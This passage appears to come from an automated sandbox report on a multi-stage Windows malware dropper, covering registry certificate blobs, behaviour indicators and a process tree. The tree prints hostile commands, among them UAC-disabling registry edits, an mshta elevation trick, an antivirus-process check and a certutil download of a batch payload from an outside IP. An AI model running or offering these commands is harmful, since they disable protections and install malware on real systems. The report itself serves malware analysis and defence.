190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a vg9qcBa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a vg9qcBa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 vg9qcBa.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a vg9qcBa.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4912 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1920 schtasks.exe 1644 schtasks.exe 1596 schtasks.exe 2336 schtasks.exe 568 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2328 maza-qt.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4580 Bypass.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2964 1321710862.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 112 Legend.pif 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 852 2063426219.exe 852 2063426219.exe 2904 powershell.exe 852 2063426219.exe 852 2063426219.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 1540 winupsecvmgr.exe 1540 winupsecvmgr.exe 1892 powershell.exe 2644 taskmgr.exe 1540 winupsecvmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2644 taskmgr.exe 2328 maza-qt.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2072 4363463463464363463463463.exe Token: SeDebugPrivilege 2644 taskmgr.exe Token: SeDebugPrivilege 2608 crypted.exe Token: SeDebugPrivilege 2964 1321710862.exe Token: SeDebugPrivilege 2804 tasklist.exe Token: SeDebugPrivilege 2996 tasklist.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeLockMemoryPrivilege 1140 dwm.exe Token: SeLockMemoryPrivilege 1140 dwm.exe Token: SeDebugPrivilege 1636 Discord3.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeShutdownPrivilege 2892 chrome.exe Token: SeDebugPrivilege 2264 Discord.exe Token: 33 2720 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2720 AUDIODG.EXE Token: 33 2720 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2720 AUDIODG.EXE Token: SeDebugPrivilege 2976 computerlead.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeDebugPrivilege 3828 taskkill.exe Token: SeDebugPrivilege 3224 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 2764 taskkill.exe Token: SeDebugPrivilege 3176 taskkill.exe Token: SeDebugPrivilege 3572 firefox.exe Token: SeDebugPrivilege 3572 firefox.exe Token: SeDebugPrivilege 3956 32b1c3a712.exe Token: SeDebugPrivilege 3568 morphic.exe Token: SeBackupPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeBackupPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe Token: SeSecurityPrivilege 3568 morphic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 112 Legend.pif 112 Legend.pif 112 Legend.pif 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 112 Legend.pif 112 Legend.pif 112 Legend.pif 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe 1140 dwm.exe 2644 taskmgr.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1580 up.exe 2328 maza-qt.exe 2328 maza-qt.exe 2328 maza-qt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2656 2072 4363463463464363463463463.exe 31 PID 2072 wrote to memory of 2656 2072 4363463463464363463463463.exe 31 PID 2072 wrote to memory of 2656 2072 4363463463464363463463463.exe 31 PID 2072 wrote to memory of 2656 2072 4363463463464363463463463.exe 31 PID 2656 wrote to memory of 236 2656 tdrpload.exe 34 PID 2656 wrote to memory of 236 2656 tdrpload.exe 34 PID 2656 wrote to memory of 236 2656 tdrpload.exe 34 PID 2656 wrote to memory of 236 2656 tdrpload.exe 34 PID 2072 wrote to memory of 1048 2072 4363463463464363463463463.exe 35 PID 2072 wrote to memory of 1048 2072 4363463463464363463463463.exe 35 PID 2072 wrote to memory of 1048 2072 4363463463464363463463463.exe 35 PID 2072 wrote to memory of 1048 2072 4363463463464363463463463.exe 35 PID 2072 wrote to memory of 2608 2072 4363463463464363463463463.exe 36 PID 2072 wrote to memory of 2608 2072 4363463463464363463463463.exe 36 PID 2072 wrote to memory of 2608 2072 4363463463464363463463463.exe 36 PID 2072 wrote to memory of 2608 2072 4363463463464363463463463.exe 36 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 2608 wrote to memory of 304 2608 crypted.exe 37 PID 236 wrote to memory of 2964 236 sysnldcvmr.exe 39 PID 236 wrote to memory of 2964 236 sysnldcvmr.exe 39 PID 236 wrote to memory of 2964 236 sysnldcvmr.exe 39 PID 236 wrote to memory of 2964 236 sysnldcvmr.exe 39 PID 2964 wrote to memory of 604 2964 1321710862.exe 40 PID 2964 wrote to memory of 604 2964 1321710862.exe 40 PID 2964 wrote to memory of 604 2964 1321710862.exe 40 PID 2964 wrote to memory of 2368 2964 1321710862.exe 42 PID 2964 wrote to memory of 2368 2964 1321710862.exe 42 PID 2964 wrote to memory of 2368 2964 1321710862.exe 42 PID 604 wrote to memory of 2236 604 cmd.exe 44 PID 604 wrote to memory of 2236 604 cmd.exe 44 PID 604 wrote to memory of 2236 604 cmd.exe 44 PID 2368 wrote to memory of 3064 2368 cmd.exe 45 PID 2368 wrote to memory of 3064 2368 cmd.exe 45 PID 2368 wrote to memory of 3064 2368 cmd.exe 45 PID 2072 wrote to memory of 3052 2072 4363463463464363463463463.exe 46 PID 2072 wrote to memory of 3052 2072 4363463463464363463463463.exe 46 PID 2072 wrote to memory of 3052 2072 4363463463464363463463463.exe 46 PID 2072 wrote to memory of 3052 2072 4363463463464363463463463.exe 46 PID 2072 wrote to memory of 2520 2072 4363463463464363463463463.exe 48 PID 2072 wrote to memory of 2520 2072 4363463463464363463463463.exe 48 PID 2072 wrote to memory of 2520 2072 4363463463464363463463463.exe 48 PID 2072 wrote to memory of 2520 2072 4363463463464363463463463.exe 48 PID 2520 wrote to memory of 1596 2520 av_downloader.exe 50 PID 2520 wrote to memory of 1596 2520 av_downloader.exe 50 PID 2520 wrote to memory of 1596 2520 av_downloader.exe 50 PID 2520 wrote to memory of 1596 2520 av_downloader.exe 50 PID 1596 wrote to memory of 2400 1596 cmd.exe 51 PID 1596 wrote to memory of 2400 1596 cmd.exe 51 PID 1596 wrote to memory of 2400 1596 cmd.exe 51 PID 2400 wrote to memory of 624 2400 mshta.exe 52 PID 2400 wrote to memory of 624 2400 mshta.exe 52 PID 2400 wrote to memory of 624 2400 mshta.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 336 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Users\Admin\AppData\Local\Temp\1321710862.exeC:\Users\Admin\AppData\Local\Temp\1321710862.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:3064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\110673311.exeC:\Users\Admin\AppData\Local\Temp\110673311.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\2063426219.exeC:\Users\Admin\AppData\Local\Temp\2063426219.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:852
-
-
-
C:\Users\Admin\AppData\Local\Temp\3131330974.exeC:\Users\Admin\AppData\Local\Temp\3131330974.exe5⤵
- Executes dropped EXE
PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\367219602.exeC:\Users\Admin\AppData\Local\Temp\367219602.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\3866813154.exeC:\Users\Admin\AppData\Local\Temp\3866813154.exe6⤵
- Executes dropped EXE
PID:1072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\abc.exe"C:\Users\Admin\AppData\Local\Temp\Files\abc.exe"3⤵
- Executes dropped EXE
PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dkasjhajksdhdjkas.exe"C:\Users\Admin\AppData\Local\Temp\Files\dkasjhajksdhdjkas.exe"3⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\177.tmp\178.tmp\179.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:624 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\242.tmp\243.tmp\244.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"7⤵
- Enumerates connected drives
PID:1260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:2824
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:2840
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:2844
-
-
C:\Windows\system32\attrib.exeattrib +s +h e:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:336
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat8⤵PID:2832
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"3⤵
- Executes dropped EXE
PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2640
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1760 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5436485⤵
- System Location Discovery: System Language Discovery
PID:840
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BiddingVeRoutinesFilms" Bowling5⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
